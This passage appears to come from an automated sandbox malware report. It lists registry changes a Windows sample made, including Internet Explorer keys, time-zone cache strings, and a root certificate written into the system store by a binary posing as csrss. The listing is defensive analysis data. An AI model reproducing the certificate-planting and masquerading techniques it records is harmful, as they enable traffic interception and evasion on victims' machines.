Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "403733252" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3D267FE1-67A8-11EE-855F-5AE3C8A3AD14} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000008c66dacf3255794896cbcb5ac20a7140000000000200000000001066000000010000200000005be8f1f12aa97383587d20239aeb25420f72f035b669763dcfbe253c943b0dd5000000000e8000000002000020000000178e34bbc7518c96898c5fac7c7ac811aad6d9478226dfe397fc5d1ef10a4f0320000000ac1d8ce2dc905a368ae24b3eedef12b8836783c00c48b93f064b292ca8045178400000002f4e77bf76e5b319e56c18c782a695e3a3f93805f6a3fcca730926fcb84991c3bc5caae830e8899e4f1a6cecdb53d498baa80ca30ead55814c7c6771a7544875 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 009de013b5fbd901 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3